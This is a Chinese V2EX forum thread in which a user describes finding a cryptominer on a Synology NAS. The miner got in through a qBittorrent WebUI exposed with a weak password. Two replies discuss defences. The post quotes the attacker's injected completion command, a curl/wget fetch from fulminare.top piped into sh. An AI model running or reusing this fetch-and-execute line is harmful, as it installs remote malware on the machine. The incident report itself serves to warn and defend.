记一次群晖开 qbittorrent 被植入挖矿代码

91 天前
 hiyoi
起因:
偶然发现群晖 cpu 内存占用率很高。

查看进程发现有个进程以 qbittornet 用户运行这一个 名叫./PHsyYPRT 进程,名字很古怪,占了 2 核 cpu ,30%内存。

起初怀疑是 qbit 问题,马上停止套件,进程消失。 但是又过了几天,又发现相同的进程。 一顿搜索

参考:
https://www.reddit.com/r/synology/comments/1co3toi/rogue_process_eating_ram/?tl=zh-hans

发现攻击者可以在 web ui, 设置 torrent 下载完成时执行外部程序:
sh -c "(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"

考虑到之前 web ui 曾开到公网过,且用了弱密码。被轻易爆破的可能性很大。

赶紧把 web ui 公网关掉。
3086 次点击
所在节点    NAS
22 条回复
starrys
89 天前
@hiyoi #19 真是带不动你。楼上那么多人说要组网、防火墙控制,感觉你都没听进去,仍然觉得设置 2FA 、强密码就可以了,这样虽然安全程度有所提升,但还不够的,原因是“应用程序可能存在未知的漏洞导致你的主机被攻破”。
hiyoi
89 天前
@starrys 你要这么说,那就没有什么应用程序是绝对的安全。 强密码+2FA 是现在公认的比较安全的方案。

btw ,我已经把 qbit web ui 端口转发公网关了。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1137306

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX